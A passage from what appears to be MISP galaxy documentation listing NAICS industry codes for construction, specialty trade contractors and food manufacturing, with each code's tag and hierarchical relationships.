
  • parent-of: misp-galaxy:naics="2379" with estimative-language:likelihood-probability="likely"

2371

Utility System Construction

The tag is: misp-galaxy:naics="2371"

2371 has relationships with:

  • child-of: misp-galaxy:naics="237" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="23711" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="237110" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="23712" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="237120" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="23713" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="237130" with estimative-language:likelihood-probability="likely"

23711

Water and Sewer Line and Related Structures Construction

The tag is: misp-galaxy:naics="23711"

23711 has relationships with:

  • child-of: misp-galaxy:naics="2371" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="237110" with estimative-language:likelihood-probability="likely"

237110

Water and Sewer Line and Related Structures Construction

The tag is: misp-galaxy:naics="237110"

237110 has relationships with:

  • child-of: misp-galaxy:naics="2371" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="23711" with estimative-language:likelihood-probability="likely"

23712

Oil and Gas Pipeline and Related Structures Construction

The tag is: misp-galaxy:naics="23712"

23712 has relationships with:

  • child-of: misp-galaxy:naics="2371" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="237120" with estimative-language:likelihood-probability="likely"

237120

Oil and Gas Pipeline and Related Structures Construction

The tag is: misp-galaxy:naics="237120"

237120 has relationships with:

  • child-of: misp-galaxy:naics="2371" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="23712" with estimative-language:likelihood-probability="likely"

23713

Power and Communication Line and Related Structures Construction

The tag is: misp-galaxy:naics="23713"

23713 has relationships with:

  • child-of: misp-galaxy:naics="2371" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="237130" with estimative-language:likelihood-probability="likely"

237130

Power and Communication Line and Related Structures Construction

The tag is: misp-galaxy:naics="237130"

237130 has relationships with:

  • child-of: misp-galaxy:naics="2371" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="23713" with estimative-language:likelihood-probability="likely"

2372

Land Subdivision

The tag is: misp-galaxy:naics="2372"

2372 has relationships with:

  • child-of: misp-galaxy:naics="237" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="23721" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="237210" with estimative-language:likelihood-probability="likely"

23721

Land Subdivision

The tag is: misp-galaxy:naics="23721"

23721 has relationships with:

  • child-of: misp-galaxy:naics="2372" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="237210" with estimative-language:likelihood-probability="likely"

237210

Land Subdivision

The tag is: misp-galaxy:naics="237210"

237210 has relationships with:

  • child-of: misp-galaxy:naics="2372" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="23721" with estimative-language:likelihood-probability="likely"

2373

Highway, Street, and Bridge Construction

The tag is: misp-galaxy:naics="2373"

2373 has relationships with:

  • child-of: misp-galaxy:naics="237" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="23731" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="237310" with estimative-language:likelihood-probability="likely"

23731

Highway, Street, and Bridge Construction

The tag is: misp-galaxy:naics="23731"

23731 has relationships with:

  • child-of: misp-galaxy:naics="2373" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="237310" with estimative-language:likelihood-probability="likely"

237310

Highway, Street, and Bridge Construction

The tag is: misp-galaxy:naics="237310"

237310 has relationships with:

  • child-of: misp-galaxy:naics="2373" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="23731" with estimative-language:likelihood-probability="likely"

2379

Other Heavy and Civil Engineering Construction

The tag is: misp-galaxy:naics="2379"

2379 has relationships with:

  • child-of: misp-galaxy:naics="237" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="23799" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="237990" with estimative-language:likelihood-probability="likely"

23799

Other Heavy and Civil Engineering Construction

The tag is: misp-galaxy:naics="23799"

23799 has relationships with:

  • child-of: misp-galaxy:naics="2379" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="237990" with estimative-language:likelihood-probability="likely"

237990

Other Heavy and Civil Engineering Construction

The tag is: misp-galaxy:naics="237990"

237990 has relationships with:

  • child-of: misp-galaxy:naics="2379" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="23799" with estimative-language:likelihood-probability="likely"

238

Specialty Trade Contractors

The tag is: misp-galaxy:naics="238"

238 has relationships with:

  • child-of: misp-galaxy:naics="23" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="2381" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="2382" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="2383" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="2389" with estimative-language:likelihood-probability="likely"

2381

Foundation, Structure, and Building Exterior Contractors

The tag is: misp-galaxy:naics="2381"

2381 has relationships with:

  • child-of: misp-galaxy:naics="238" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="23811" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="238110" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="23812" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="238120" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="23813" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="238130" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="23814" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="238140" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="23815" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="238150" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="23816" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="238160" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="23817" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="238170" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="23819" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="238190" with estimative-language:likelihood-probability="likely"

23811

Poured Concrete Foundation and Structure Contractors

The tag is: misp-galaxy:naics="23811"

23811 has relationships with:

  • child-of: misp-galaxy:naics="2381" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="238110" with estimative-language:likelihood-probability="likely"

238110

Poured Concrete Foundation and Structure Contractors

The tag is: misp-galaxy:naics="238110"

238110 has relationships with:

  • child-of: misp-galaxy:naics="2381" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="23811" with estimative-language:likelihood-probability="likely"

23812

Structural Steel and Precast Concrete Contractors

The tag is: misp-galaxy:naics="23812"

23812 has relationships with:

  • child-of: misp-galaxy:naics="2381" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="238120" with estimative-language:likelihood-probability="likely"

238120

Structural Steel and Precast Concrete Contractors

The tag is: misp-galaxy:naics="238120"

238120 has relationships with:

  • child-of: misp-galaxy:naics="2381" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="23812" with estimative-language:likelihood-probability="likely"

23813

Framing Contractors

The tag is: misp-galaxy:naics="23813"

23813 has relationships with:

  • child-of: misp-galaxy:naics="2381" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="238130" with estimative-language:likelihood-probability="likely"

238130

Framing Contractors

The tag is: misp-galaxy:naics="238130"

238130 has relationships with:

  • child-of: misp-galaxy:naics="2381" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="23813" with estimative-language:likelihood-probability="likely"

23814

Masonry Contractors

The tag is: misp-galaxy:naics="23814"

23814 has relationships with:

  • child-of: misp-galaxy:naics="2381" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="238140" with estimative-language:likelihood-probability="likely"

238140

Masonry Contractors

The tag is: misp-galaxy:naics="238140"

238140 has relationships with:

  • child-of: misp-galaxy:naics="2381" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="23814" with estimative-language:likelihood-probability="likely"

23815

Glass and Glazing Contractors

The tag is: misp-galaxy:naics="23815"

23815 has relationships with:

  • child-of: misp-galaxy:naics="2381" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="238150" with estimative-language:likelihood-probability="likely"

238150

Glass and Glazing Contractors

The tag is: misp-galaxy:naics="238150"

238150 has relationships with:

  • child-of: misp-galaxy:naics="2381" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="23815" with estimative-language:likelihood-probability="likely"

23816

Roofing Contractors

The tag is: misp-galaxy:naics="23816"

23816 has relationships with:

  • child-of: misp-galaxy:naics="2381" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="238160" with estimative-language:likelihood-probability="likely"

238160

Roofing Contractors

The tag is: misp-galaxy:naics="238160"

238160 has relationships with:

  • child-of: misp-galaxy:naics="2381" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="23816" with estimative-language:likelihood-probability="likely"

23817

Siding Contractors

The tag is: misp-galaxy:naics="23817"

23817 has relationships with:

  • child-of: misp-galaxy:naics="2381" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="238170" with estimative-language:likelihood-probability="likely"

238170

Siding Contractors

The tag is: misp-galaxy:naics="238170"

238170 has relationships with:

  • child-of: misp-galaxy:naics="2381" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="23817" with estimative-language:likelihood-probability="likely"

23819

Other Foundation, Structure, and Building Exterior Contractors

The tag is: misp-galaxy:naics="23819"

23819 has relationships with:

  • child-of: misp-galaxy:naics="2381" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="238190" with estimative-language:likelihood-probability="likely"

238190

Other Foundation, Structure, and Building Exterior Contractors

The tag is: misp-galaxy:naics="238190"

238190 has relationships with:

  • child-of: misp-galaxy:naics="2381" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="23819" with estimative-language:likelihood-probability="likely"

2382

Building Equipment Contractors

The tag is: misp-galaxy:naics="2382"

2382 has relationships with:

  • child-of: misp-galaxy:naics="238" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="23821" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="238210" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="23822" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="238220" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="23829" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="238290" with estimative-language:likelihood-probability="likely"

23821

Electrical Contractors and Other Wiring Installation Contractors

The tag is: misp-galaxy:naics="23821"

23821 has relationships with:

  • child-of: misp-galaxy:naics="2382" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="238210" with estimative-language:likelihood-probability="likely"

238210

Electrical Contractors and Other Wiring Installation Contractors

The tag is: misp-galaxy:naics="238210"

238210 has relationships with:

  • child-of: misp-galaxy:naics="2382" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="23821" with estimative-language:likelihood-probability="likely"

23822

Plumbing, Heating, and Air-Conditioning Contractors

The tag is: misp-galaxy:naics="23822"

23822 has relationships with:

  • child-of: misp-galaxy:naics="2382" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="238220" with estimative-language:likelihood-probability="likely"

238220

Plumbing, Heating, and Air-Conditioning Contractors

The tag is: misp-galaxy:naics="238220"

238220 has relationships with:

  • child-of: misp-galaxy:naics="2382" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="23822" with estimative-language:likelihood-probability="likely"

23829

Other Building Equipment Contractors

The tag is: misp-galaxy:naics="23829"

23829 has relationships with:

  • child-of: misp-galaxy:naics="2382" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="238290" with estimative-language:likelihood-probability="likely"

238290

Other Building Equipment Contractors

The tag is: misp-galaxy:naics="238290"

238290 has relationships with:

  • child-of: misp-galaxy:naics="2382" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="23829" with estimative-language:likelihood-probability="likely"

2383

Building Finishing Contractors

The tag is: misp-galaxy:naics="2383"

2383 has relationships with:

  • child-of: misp-galaxy:naics="238" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="23831" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="238310" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="23832" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="238320" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="23833" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="238330" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="23834" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="238340" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="23835" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="238350" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="23839" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="238390" with estimative-language:likelihood-probability="likely"

23831

Drywall and Insulation Contractors

The tag is: misp-galaxy:naics="23831"

23831 has relationships with:

  • child-of: misp-galaxy:naics="2383" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="238310" with estimative-language:likelihood-probability="likely"

238310

Drywall and Insulation Contractors

The tag is: misp-galaxy:naics="238310"

238310 has relationships with:

  • child-of: misp-galaxy:naics="2383" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="23831" with estimative-language:likelihood-probability="likely"

23832

Painting and Wall Covering Contractors

The tag is: misp-galaxy:naics="23832"

23832 has relationships with:

  • child-of: misp-galaxy:naics="2383" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="238320" with estimative-language:likelihood-probability="likely"

238320

Painting and Wall Covering Contractors

The tag is: misp-galaxy:naics="238320"

238320 has relationships with:

  • child-of: misp-galaxy:naics="2383" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="23832" with estimative-language:likelihood-probability="likely"

23833

Flooring Contractors

The tag is: misp-galaxy:naics="23833"

23833 has relationships with:

  • child-of: misp-galaxy:naics="2383" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="238330" with estimative-language:likelihood-probability="likely"

238330

Flooring Contractors

The tag is: misp-galaxy:naics="238330"

238330 has relationships with:

  • child-of: misp-galaxy:naics="2383" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="23833" with estimative-language:likelihood-probability="likely"

23834

Tile and Terrazzo Contractors

The tag is: misp-galaxy:naics="23834"

23834 has relationships with:

  • child-of: misp-galaxy:naics="2383" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="238340" with estimative-language:likelihood-probability="likely"

238340

Tile and Terrazzo Contractors

The tag is: misp-galaxy:naics="238340"

238340 has relationships with:

  • child-of: misp-galaxy:naics="2383" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="23834" with estimative-language:likelihood-probability="likely"

23835

Finish Carpentry Contractors

The tag is: misp-galaxy:naics="23835"

23835 has relationships with:

  • child-of: misp-galaxy:naics="2383" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="238350" with estimative-language:likelihood-probability="likely"

238350

Finish Carpentry Contractors

The tag is: misp-galaxy:naics="238350"

238350 has relationships with:

  • child-of: misp-galaxy:naics="2383" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="23835" with estimative-language:likelihood-probability="likely"

23839

Other Building Finishing Contractors

The tag is: misp-galaxy:naics="23839"

23839 has relationships with:

  • child-of: misp-galaxy:naics="2383" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="238390" with estimative-language:likelihood-probability="likely"

238390

Other Building Finishing Contractors

The tag is: misp-galaxy:naics="238390"

238390 has relationships with:

  • child-of: misp-galaxy:naics="2383" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="23839" with estimative-language:likelihood-probability="likely"

2389

Other Specialty Trade Contractors

The tag is: misp-galaxy:naics="2389"

2389 has relationships with:

  • child-of: misp-galaxy:naics="238" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="23891" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="238910" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="23899" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="238990" with estimative-language:likelihood-probability="likely"

23891

Site Preparation Contractors

The tag is: misp-galaxy:naics="23891"

23891 has relationships with:

  • child-of: misp-galaxy:naics="2389" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="238910" with estimative-language:likelihood-probability="likely"

238910

Site Preparation Contractors

The tag is: misp-galaxy:naics="238910"

238910 has relationships with:

  • child-of: misp-galaxy:naics="2389" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="23891" with estimative-language:likelihood-probability="likely"

23899

All Other Specialty Trade Contractors

The tag is: misp-galaxy:naics="23899"

23899 has relationships with:

  • child-of: misp-galaxy:naics="2389" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="238990" with estimative-language:likelihood-probability="likely"

238990

All Other Specialty Trade Contractors

The tag is: misp-galaxy:naics="238990"

238990 has relationships with:

  • child-of: misp-galaxy:naics="2389" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="23899" with estimative-language:likelihood-probability="likely"

31-33

Manufacturing

The tag is: misp-galaxy:naics="31-33"

311

Food Manufacturing

The tag is: misp-galaxy:naics="311"

311 has relationships with:

  • parent-of: misp-galaxy:naics="3111" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3112" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3113" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3114" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3115" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3116" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3117" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3118" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3119" with estimative-language:likelihood-probability="likely"

3111

Animal Food Manufacturing

The tag is: misp-galaxy:naics="3111"

3111 has relationships with:

  • child-of: misp-galaxy:naics="311" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="31111" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="311111" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="311119" with estimative-language:likelihood-probability="likely"

31111

Animal Food Manufacturing

The tag is: misp-galaxy:naics="31111"

31111 has relationships with:

  • child-of: misp-galaxy:naics="3111" with estimative-language:likelihood-probability="likely"

311111

Dog and Cat Food Manufacturing

The tag is: misp-galaxy:naics="311111"

311111 has relationships with:

  • child-of: misp-galaxy:naics="3111" with estimative-language:likelihood-probability="likely"

311119

Other Animal Food Manufacturing

The tag is: misp-galaxy:naics="311119"

311119 has relationships with:

  • child-of: misp-galaxy:naics="3111" with estimative-language:likelihood-probability="likely"

3112

Grain and Oilseed Milling

The tag is: misp-galaxy:naics="3112"

3112 has relationships with:

  • child-of: misp-galaxy:naics="311" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="31121" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="311211" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="311212" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="311213" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="31122" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="311221" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="311224" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="311225" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="31123" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="311230" with estimative-language:likelihood-probability="likely"

31121

Flour Milling and Malt Manufacturing

The tag is: misp-galaxy:naics="31121"

31121 has relationships with:

  • child-of: misp-galaxy:naics="3112" with estimative-language:likelihood-probability="likely"

311211

Flour Milling

The tag is: misp-galaxy:naics="311211"

311211 has relationships with:

  • child-of: misp-galaxy:naics="3112" with estimative-language:likelihood-probability="likely"

311212

Rice Milling

The tag is: misp-galaxy:naics="311212"

311212 has relationships with:

  • child-of: misp-galaxy:naics="3112" with estimative-language:likelihood-probability="likely"

311213

Malt Manufacturing

The tag is: misp-galaxy:naics="311213"

311213 has relationships with:

  • child-of: misp-galaxy:naics="3112" with estimative-language:likelihood-probability="likely"

31122

Starch and Vegetable Fats and Oils Manufacturing

The tag is: misp-galaxy:naics="31122"

31122 has relationships with:

  • child-of: misp-galaxy:naics="3112" with estimative-language:likelihood-probability="likely"

311221

Wet Corn Milling and Starch Manufacturing

The tag is: misp-galaxy:naics="311221"

311221 has relationships with:

  • child-of: misp-galaxy:naics="3112" with estimative-language:likelihood-probability="likely"

311224

Soybean and Other Oilseed Processing

The tag is: misp-galaxy:naics="311224"

311224 has relationships with:

  • child-of: misp-galaxy:naics="3112" with estimative-language:likelihood-probability="likely"

311225

Fats and Oils Refining and Blending

The tag is: misp-galaxy:naics="311225"

311225 has relationships with:

  • child-of: misp-galaxy:naics="3112" with estimative-language:likelihood-probability="likely"

31123

Breakfast Cereal Manufacturing

The tag is: misp-galaxy:naics="31123"

31123 has relationships with:

  • child-of: misp-galaxy:naics="3112" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="311230" with estimative-language:likelihood-probability="likely"

311230

Breakfast Cereal Manufacturing

The tag is: misp-galaxy:naics="311230"

311230 has relationships with:

  • child-of: misp-galaxy:naics="3112" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="31123" with estimative-language:likelihood-probability="likely"

3113

Sugar and Confectionery Product Manufacturing

The tag is: misp-galaxy:naics="3113"

3113 has relationships with:

  • child-of: misp-galaxy:naics="311" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="31131" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="311313" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="311314" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="31134" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="311340" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="31135" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="311351" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="311352" with estimative-language:likelihood-probability="likely"

31131

Sugar Manufacturing

The tag is: misp-galaxy:naics="31131"

31131 has relationships with:

  • child-of: misp-galaxy:naics="3113" with estimative-language:likelihood-probability="likely"

311313

Beet Sugar Manufacturing

The tag is: misp-galaxy:naics="311313"

311313 has relationships with:

  • child-of: misp-galaxy:naics="3113" with estimative-language:likelihood-probability="likely"

311314

Cane Sugar Manufacturing

The tag is: misp-galaxy:naics="311314"

311314 has relationships with:

  • child-of: misp-galaxy:naics="3113" with estimative-language:likelihood-probability="likely"

31134

Nonchocolate Confectionery Manufacturing

The tag is: misp-galaxy:naics="31134"

31134 has relationships with:

  • child-of: misp-galaxy:naics="3113" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="311340" with estimative-language:likelihood-probability="likely"

311340

Nonchocolate Confectionery Manufacturing

The tag is: misp-galaxy:naics="311340"

311340 has relationships with:

  • child-of: misp-galaxy:naics="3113" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="31134" with estimative-language:likelihood-probability="likely"

31135

Chocolate and Confectionery Manufacturing

The tag is: misp-galaxy:naics="31135"

31135 has relationships with:

  • child-of: misp-galaxy:naics="3113" with estimative-language:likelihood-probability="likely"

311351

Chocolate and Confectionery Manufacturing from Cacao Beans

The tag is: misp-galaxy:naics="311351"

311351 has relationships with:

  • child-of: misp-galaxy:naics="3113" with estimative-language:likelihood-probability="likely"

311352

Confectionery Manufacturing from Purchased Chocolate

The tag is: misp-galaxy:naics="311352"

311352 has relationships with:

  • child-of: misp-galaxy:naics="3113" with estimative-language:likelihood-probability="likely"

3114

Fruit and Vegetable Preserving and Specialty Food Manufacturing

The tag is: misp-galaxy:naics="3114"

3114 has relationships with:

  • child-of: misp-galaxy:naics="311" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="31141" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="311411" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="311412" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="31142" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="311421" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="311422" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="311423" with estimative-language:likelihood-probability="likely"

31141

Frozen Food Manufacturing

The tag is: misp-galaxy:naics="31141"

31141 has relationships with:

  • child-of: misp-galaxy:naics="3114" with estimative-language:likelihood-probability="likely"

311411

Frozen Fruit, Juice, and Vegetable Manufacturing

The tag is: misp-galaxy:naics="311411"

311411 has relationships with:

  • child-of: misp-galaxy:naics="3114" with estimative-language:likelihood-probability="likely"

311412

Frozen Specialty Food Manufacturing

The tag is: misp-galaxy:naics="311412"

311412 has relationships with:

  • child-of: misp-galaxy:naics="3114" with estimative-language:likelihood-probability="likely"

31142

Fruit and Vegetable Canning, Pickling, and Drying

The tag is: misp-galaxy:naics="31142"

31142 has relationships with:

  • child-of: misp-galaxy:naics="3114" with estimative-language:likelihood-probability="likely"

311421

Fruit and Vegetable Canning

The tag is: misp-galaxy:naics="311421"

311421 has relationships with:

  • child-of: misp-galaxy:naics="3114" with estimative-language:likelihood-probability="likely"

311422

Specialty Canning

The tag is: misp-galaxy:naics="311422"

311422 has relationships with:

  • child-of: misp-galaxy:naics="3114" with estimative-language:likelihood-probability="likely"

311423

Dried and Dehydrated Food Manufacturing

The tag is: misp-galaxy:naics="311423"

311423 has relationships with:

  • child-of: misp-galaxy:naics="3114" with estimative-language:likelihood-probability="likely"

3115

Dairy Product Manufacturing

The tag is: misp-galaxy:naics="3115"

3115 has relationships with:

  • child-of: misp-galaxy:naics="311" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="31151" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="311511" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="311512" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="311513" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="311514" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="31152" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="311520" with estimative-language:likelihood-probability="likely"

31151

Dairy Product (except Frozen) Manufacturing

The tag is: misp-galaxy:naics="31151"

31151 has relationships with:

  • child-of: misp-galaxy:naics="3115" with estimative-language:likelihood-probability="likely"

311511

Fluid Milk Manufacturing

The tag is: misp-galaxy:naics="311511"

311511 has relationships with:

  • child-of: misp-galaxy:naics="3115" with estimative-language:likelihood-probability="likely"

311512

Creamery Butter Manufacturing

The tag is: misp-galaxy:naics="311512"

311512 has relationships with:

  • child-of: misp-galaxy:naics="3115" with estimative-language:likelihood-probability="likely"

311513

Cheese Manufacturing

The tag is: misp-galaxy:naics="311513"

311513 has relationships with:

  • child-of: misp-galaxy:naics="3115" with estimative-language:likelihood-probability="likely"

311514

Dry, Condensed, and Evaporated Dairy Product Manufacturing

The tag is: misp-galaxy:naics="311514"

311514 has relationships with:

  • child-of: misp-galaxy:naics="3115" with estimative-language:likelihood-probability="likely"

31152

Ice Cream and Frozen Dessert Manufacturing

The tag is: misp-galaxy:naics="31152"

31152 has relationships with:

  • child-of: misp-galaxy:naics="3115" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="311520" with estimative-language:likelihood-probability="likely"

311520

Ice Cream and Frozen Dessert Manufacturing

The tag is: misp-galaxy:naics="311520"

311520 has relationships with:

  • child-of: misp-galaxy:naics="3115" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="31152" with estimative-language:likelihood-probability="likely"

3116

Animal Slaughtering and Processing

The tag is: misp-galaxy:naics="3116"

3116 has relationships with:

  • child-of: misp-galaxy:naics="311" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="31161" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="311611" with estimative-language:likelihood-probability="likely"

